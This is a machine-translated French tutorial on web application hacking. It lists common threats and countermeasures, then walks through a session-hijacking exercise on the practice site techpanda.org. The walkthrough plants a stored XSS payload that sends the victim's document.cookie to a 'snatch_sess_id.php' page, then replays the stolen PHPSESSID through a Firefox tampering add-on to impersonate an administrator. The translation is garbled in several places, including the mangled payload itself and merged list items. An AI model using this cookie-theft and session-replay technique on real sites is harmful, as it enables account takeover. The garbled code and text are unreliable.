Plus de personnes ont accès à Internet que jamais auparavant. Cela a incité de nombreuses organisations à développer des applications Web que les utilisateurs peuvent utiliser en ligne pour interagir avec l’organisation. Le code mal écrit pour les applications Web peut être exploité pour obtenir un accès non autorisé aux données sensibles et aux serveurs Web.

Dans ce tutoriel, vous apprendrez à pirater des sites Web, et nous vous présenterons les techniques de piratage d’applications Web et les contre-mesures que vous pouvez mettre en place pour vous protéger contre de telles attaques.

Sujets abordés dans ce tutoriel

• Qu’est-ce qu’une application web ? Que sont les menaces Web ?
• Comment protéger votre site Web contre les piratages ?
• Astuces de piratage de site Web: Pirater un site Web en ligne!

Qu’est-ce qu’une application web ? Que sont les menaces Web ?

Une application web (ou site web) est une application basée sur le modèle client-serveur. Le serveur fournit l’accès à la base de données et la logique métier. Il est hébergé sur un serveur Web. L’application cliente s’exécute sur le navigateur Web client. Les applications Web sont généralement écrites dans des langages tels que Java, C# et VB.Net , PHP, Langage de balisage ColdFusion, etc. les moteurs de base de données utilisés dans les applications Web incluent MySQL, MS SQL Server, PostgreSQL, SQLite, etc.

La plupart des applications web sont hébergées sur des serveurs publics accessibles via Internet. Cela les rend vulnérables aux attaques en raison de leur accessibilité facile. Voici les menaces courantes pour les applications Web.

• Injection SQL – l’objectif de cette menace pourrait être de contourner les algorithmes de connexion, de saboter les données, etc.
• Attaques par déni de service – le but de cette menace pourrait être de refuser aux utilisateurs légitimes l’accès à la ressource
• Cross Site Scripting XSS – le but de cette menace pourrait être d’injecter du code pouvant être exécuté sur le navigateur côté client.
• Empoisonnement des cookies / sessions – le but de cette menace est de modifier les cookies / données de session par un attaquant pour obtenir un accès non autorisé.
• Falsification de formulaire – l’objectif de cette menace est de modifier les données de formulaire telles que les prix dans les applications de commerce électronique afin que l’attaquant puisse obtenir des articles à des prix réduits.
• Injection de code – le but de cette menace est d’injecter du code tel que PHP, Python, etc. cela peut être exécuté sur le serveur. Le code peut installer des portes dérobées, révéler des informations sensibles, etc.
• Defacement – le but de cette menace est de modifier la page affichée sur un site Web et de rediriger toutes les demandes de page vers une seule page contenant le message de l’attaquant.

Comment protéger votre site Web contre les piratages ?

Une organisation peut adopter la politique suivante pour se protéger contre les attaques de serveurs Web.

• Injection SQL – la désinfection et la validation des paramètres utilisateur avant de les soumettre à la base de données pour traitement peuvent aider à réduire les risques d’attaque par injection SQL. Moteurs de base de données tels que MS SQL Server, MySQL, etc. paramètres de support et déclarations préparées. Ils sont beaucoup plus sûrs que les attaques par déni de service par instructions SQL traditionnelles – les pare-feu peuvent être utilisés pour supprimer le trafic d’une adresse IP suspecte si l’attaque est un simple DoS. Une bonne configuration des réseaux et du système de détection d’intrusion peut également aider à réduire les chances de réussite d’une attaque DoS.
• Cross Site Scripting – la validation et la désinfection des en-têtes, des paramètres transmis via l’URL, des paramètres de formulaire et des valeurs cachées peuvent aider à réduire les attaques XSS.
• Empoisonnement des cookies / sessions – cela peut être évité en cryptant le contenu des cookies, en les supprimant au bout d’un certain temps, en associant les cookies à l’adresse IP du client qui a été utilisée pour les créer.
• Trempe de formulaire – cela peut être évité en validant et en vérifiant l’entrée de l’utilisateur avant de la traiter.
• Injection de code – ceci peut être évité en traitant tous les paramètres comme des données plutôt que du code exécutable. La désinfection et la validation peuvent être utilisées pour la mettre en œuvre.
• Defacement – une bonne politique de sécurité de développement d’applications Web doit garantir qu’elle scelle les vulnérabilités couramment utilisées pour accéder au serveur Web. Il peut s’agir d’une configuration correcte du système d’exploitation, du logiciel de serveur Web et des meilleures pratiques de sécurité lors du développement d’applications Web.

Astuces de piratage de site Web: Pirater un site Web en ligne

Dans ce scénario pratique de piratage de site Web, nous allons détourner la session utilisateur de l’application Web située à www.techpanda.org . Nous utiliserons des scripts intersite pour lire l’ID de session du cookie, puis l’utiliserons pour usurper l’identité d’une session d’utilisateur légitime.

L’hypothèse retenue est que l’attaquant a accès à l’application Web et qu’il aimerait détourner les sessions d’autres utilisateurs qui utilisent la même application. Le but de cette attaque pourrait être d’obtenir un accès administrateur à l’application Web en supposant que le compte d’accès de l’attaquant soit limité.

Mise en route

• Open http://www.techpanda.org/
• Pour des raisons pratiques, il est fortement recommandé d’accéder à l’aide de l’injection SQL. Reportez-vous à cet article pour plus d’informations sur la façon de le faire.
• L’e-mail de connexion est Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer JavaScript pour l’afficher., le mot de passe est Password2010
• Si vous vous êtes connecté avec succès, vous obtiendrez le tableau de bord suivant

• Cliquez sur Ajouter un nouveau contact
• Entrez ce qui suit comme prénom

il est possible d’utiliser un document href=#onclick=\ ».location=\’http://techpanda.org/snatch_sess_id.php?c=\’+escape\(document.cookie \)\;\ »>Dark </a>

ICI,

Le code ci-dessus utilise JavaScript. Il ajoute un lien hypertexte avec un événement onclick. Lorsque l’utilisateur sans méfiance clique sur le lien, l’événement récupère l’ID de session du cookie PHP et l’envoie au snatch_sess_id.page php avec l’id de session dans l’URL



• Entrez les détails restants comme indiqué ci-dessous
• Cliquez sur Enregistrer les modifications



• Votre tableau de bord ressemblera désormais à l’écran suivant



• Étant donné que le code de script intersite est stocké dans la base de données, il sera chargé à chaque fois que le les utilisateurs ayant des droits d’accès se connectent
• Supposons que l’administrateur se connecte et clique sur le lien hypertexte indiquant Dark
• Il / elle obtiendra la fenêtre avec l’id de session s’affichant dans l’URL



Remarque: le script pourrait envoyer la valeur à certains utilisateurs ayant des droits d’accès serveur distant où le PHPSESSID est stocké, l’utilisateur est redirigé vers le site Web comme si de rien n’était.

Note: la valeur que vous obtenez peut être différente de celle de ce tutoriel de piratage de page Web, mais le concept est le même

Usurpation d’identité de session à l’aide de Firefox et du module complémentaire de données de falsification

L’organigramme ci-dessous montre les étapes à suivre pour terminer cet exercice.



• Vous aurez besoin du navigateur Web Firefox pour cette section et du module complémentaire de données de falsification
• Ouvrez Firefox et installez l’add comme indiqué dans les diagrammes ci-dessous





• Recherchez des données de falsification puis cliquez sur installer comme indiqué ci-dessus



• Cliquez sur sur Accepter et installer…





• Cliquez sur Redémarrer maintenant lorsque l’installation est terminée
• Activez la barre de menus dans Firefox si elle n’est pas affichée



• Cliquez sur le menu outils puis sélectionnez les données de falsification comme indiqué ci-dessous



• Vous obtiendrez la fenêtre suivante. Remarque: Si Windows n’est pas vide, cliquez sur le bouton effacer



• Cliquez sur Démarrer le menu de sabotage
• Revenez au navigateur Web Firefox, tapez http://www.techpanda.org/ tableau de bord .php appuie ensuite sur la touche entrée pour charger la page
• Vous obtiendrez la fenêtre contextuelle suivante à partir des données de falsification



• La fenêtre contextuelle a trois (3) options. L’option d’inviolabilité vous permet de modifier les informations d’en-tête HTTP avant qu’elles ne soient soumises au serveur.
• Cliquez dessus
• Vous obtiendrez la fenêtre suivante



• Copiez l’ID de session PHP que vous avez copié à partir de l’URL d’attaque et collez-le après le signe égal. Votre valeur devrait maintenant ressembler à ceci

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

• Cliquez sur le bouton OK
• Vous obtiendrez à nouveau la fenêtre contextuelle des données de falsification



• Décochez la case qui demande de continuer la falsification?
• Cliquez sur le bouton soumettre une fois terminé
• Vous devriez pouvoir voir le tableau de bord comme indiqué ci-dessous



Remarque: nous ne nous sommes pas connectés, nous avons usurpé l’identité d’une session de connexion en utilisant la valeur PHPSESSID que nous avons récupérée à l’aide de scripts intersite

Résumé

• Une application Web est basée sur le modèle serveur-client. Le côté client utilise le navigateur Web pour accéder aux ressources du serveur.
• Les applications Web sont généralement accessibles sur Internet. Cela les rend vulnérables aux attaques.
• Les menaces des applications Web incluent l’injection SQL, l’Injection de Code, le XSS, la Dégradation, l’empoisonnement des cookies, etc.
• Une bonne politique de sécurité lors du développement d’applications Web peut aider à les sécuriser.